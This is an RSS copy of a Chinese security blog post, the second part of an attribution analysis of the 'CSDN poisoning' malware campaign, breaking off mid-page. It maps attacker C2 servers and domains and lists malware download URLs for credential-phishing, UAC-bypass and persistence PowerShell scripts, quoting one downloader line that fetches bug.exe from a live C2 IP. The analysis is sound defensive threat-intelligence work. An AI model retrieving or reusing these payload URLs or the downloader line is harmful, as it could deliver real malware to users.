<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>王小明的事</title>
    <link>https://wechat2rss.xlab.app/feed/4d5625268306f53fca5c6e8cb59daf73ca57d5e0.xml</link>
    <description>一个脚本小子的自我修行。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (王小明的事)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM6N4HJ3lM50t9ezjYibKYaVMIhCF1KZZzDM7tHD1AIqibBQ/0</url>
      <title>王小明的事</title>
      <link>https://wechat2rss.xlab.app/feed/4d5625268306f53fca5c6e8cb59daf73ca57d5e0.xml</link>
    </image>
    <item>
      <title>CSDN投毒是谁干的（二）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247485280&amp;idx=1&amp;sn=64c67121ee64224b6e620cde2e771ef3</link>
      <description>是他们么？</description>
      <content:encoded><![CDATA[<p>
原创 <span>热心网友</span> <span>2025-01-24 07:05</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>是他们么？</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=a8f81a4a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9mpDMnKjq0Qib23b8MIPibOcoXwjl19CaranYcIV0ZdTSBdZPZ2u0vYjw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">再次声明</span></span><span style="display: none;"></span></h2><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这只是一个路人的分析过程，有无法避免的信息、认知局限性，当个故事看看就好。</span></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">攻击者身份溯源</span></span><span style="display: none;"></span></h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 20px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">网络资产拓线分析</span></span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">书接上回。</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">已知网络 ioc 拓线</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">通过对 QAX 披露之后仍然活着的 C2 地址的全端口和 web 扫描，总结出了一些攻击者基础设施的规律（不一定准确，只是看上去）：</span></p><ol style="list-style-type: decimal;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p><span leaf="">IP大多数香港，后续关联出的少数美国 IP。</span></p></li><li><p><span leaf="">SSH 端口基本都是高端口随机，少数是 22。</span></p></li><li><p><span leaf="">8082、8084、8087 这几个交替出现。</span></p></li><li><p><span leaf="">服务器上总会有一个随机高端口的服务，具体服务和用途未知。</span></p></li><li><p><span leaf="">钟爱宝塔，服务器基本都带宝塔（888推断的）。</span></p></li><li><p><span leaf="">web基本都是 PHP 起的。</span></p></li><li><p><span leaf="">web 根目录经常有 config.ini。</span></p></li><li><p><span leaf="">C2 使用上 Go 写的东西有一定占比。</span></p></li></ol><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">fix-ssl[.]com - 107.148.62.90</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个 IP 很像是个重要的 C2，从被曝光开始一直没有关闭过。</span></p><p><img data-imgfileid="100001471" class="rich_pages wxw-img" data-ratio="0.24526198439241917" data-s="300,640" data-type="png" data-w="1794" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=85cd53c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Y5Ks7sB7icvmuUt3AtQv4GCYZJe4YzbbtbLmm9XYqOVfBhE3od9AEwg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">通过 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.fix-ssl[.]com</span></code><span leaf=""> 关联出一个12月18日才被上传的名为 read.exe 的样本。（要注意只搜索 fix-ssl[.]com 是关联不出来它的。）</span></p><p><img data-imgfileid="100001470" class="rich_pages wxw-img" data-ratio="0.2602739726027397" data-s="300,640" data-type="png" data-w="1898" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2a5dfba7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY99Z1KfRNM7Y539sOxf1p1YMnDf17iaa7XYo1HSekFJWzbYX7IRpSo1iaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这些文件目前都还能下载到，内容也很好懂。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://m.7zei[.]com/CredsLeaker.ps1" target="_blank">https://m.7zei[.]com/CredsLeaker.ps1</a></span></code><span leaf="">  -&gt; 钓锁屏密码</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://m.7zei[.]com/update.ps1" target="_blank">https://m.7zei[.]com/update.ps1</a></span></code><span leaf=""> -&gt; 过UAC运行二段🐎</span></p><p><img data-imgfileid="100001472" class="rich_pages wxw-img" data-ratio="0.3776160145586897" data-s="300,640" data-type="png" data-w="2198" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1845bf65&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9bdI3kZicNUenuGicm69hZQtAicxQ84ZSALZdiaEetMicyvXibCfRv2ClKX2Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">ps1 脚本中关联出了新的木马下载地址（此处不赘述样本，都在文末的样本信息表格中）。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span style="color: #d19a66;line-height: 26px;"><span leaf="">$downloadUrl</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;<a href="http://47.242.214.157/bug.exe" target="_blank">http://47.242.214.157/bug.exe</a>&#34;</span></span><span leaf="">  //最开始找到bug.exe我寻思这名字肯定是测试样本吧，没想到生产环境就叫这个...</span><span leaf=""><br/></span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$localPath</span></span><span leaf=""> = </span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;</span><span style="color: #d19a66;line-height: 26px;"><span leaf="">$env</span></span><span leaf="">:TEMP\update.exe&#34;</span></span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://www.fix-ssl[.]com/startup.ps1" target="_blank">https://www.fix-ssl[.]com/startup.ps1</a></span></code><span leaf=""> -&gt; 计划任务启动项</span></p><p><img data-imgfileid="100001474" class="rich_pages wxw-img" data-ratio="0.30656934306569344" data-s="300,640" data-type="png" data-w="2466" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=671081d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9X4n3wREkJMpTdXicj4sjFQ7Pxe22pcJdzicQFj23iaZBW4z1oGRCnibeibw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">m.7zei[.]com</span></code><span leaf=""> 和 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.fix-ssl[.]com</span></code><span leaf=""> 两个域名的关联更加坐实了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7zei[.]com</span></code><span leaf=""> 极大概率是 CSDN 投毒事件的基础设施之一，以及两个域名这种轻度的 &#34;红队属性&#34;。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这种带注释的规范脚本看上去有点 ChatGPT 帮写的嫌疑。</span></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">analyze.sogoudoc[.]com - 8.217.107.66</span></span></h5><p><img data-imgfileid="100001473" class="rich_pages wxw-img" data-ratio="0.20578420467185762" data-s="300,640" data-type="png" data-w="1798" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6f9bdd37&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Jic0gx0tWibd4hH3xUS1fIjLcfZWN0qOqK0U64jUjN4sHdndxcvdFnJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个 IP 绑定了本次事件中多个出镜域名，已经被标满了。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">flash-update.com</span><span leaf=""><br/></span><span leaf="">analyze.sogoucache.com</span><span leaf=""><br/></span><span leaf="">update.csdnssl.com</span><span leaf=""><br/></span><span leaf="">www.flash-update.com</span><span leaf=""><br/></span><span leaf="">upload.sogoudoc.com</span><span leaf=""><br/></span><span leaf="">analyze.sogoudoc.com</span><span leaf=""><br/></span></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><span leaf=""><br/></span></figure><p><img data-imgfileid="100001475" class="rich_pages wxw-img" data-ratio="0.4095617529880478" data-s="300,640" data-type="png" data-w="2510" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2aca093c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9y4hZg9iapVRjMbUJsTDrHuiarZT8n1YylAJR0iahNY0mykUyibSWXPAJrQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">ntpfix[.]com - 47.242.214.157</span></span></h5><p><img data-imgfileid="100001476" class="rich_pages wxw-img" data-ratio="0.251959686450168" data-s="300,640" data-type="png" data-w="1786" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5b231844&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9rjP309GTTS6zVJ6k72So1EOCLCicZGUL1EkpggRiaia1OKRKPzInRtMwg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可以下载到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://47.242.214.157/config.ini" target="_blank">http://47.242.214.157/config.ini</a></span></code><span leaf="">，内容为：</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">[ConfigInfo]</span><span leaf=""><br/></span><span leaf="">passUpdate=0</span><span leaf=""><br/></span><span leaf="">isUpdate=0</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据样本的关联还可以下载到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://47.242.214.157/aliyunoss1111" target="_blank">http://47.242.214.157/aliyunoss1111</a></span></code><span leaf="">，但是内容也是无意义的文件，类似 shellcode。</span></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">www.sslupdate[.]net - 47.239.5.111</span></span></h5><p><img data-imgfileid="100001477" class="rich_pages wxw-img" data-ratio="0.18091009988901222" data-s="300,640" data-type="png" data-w="1802" type="block" 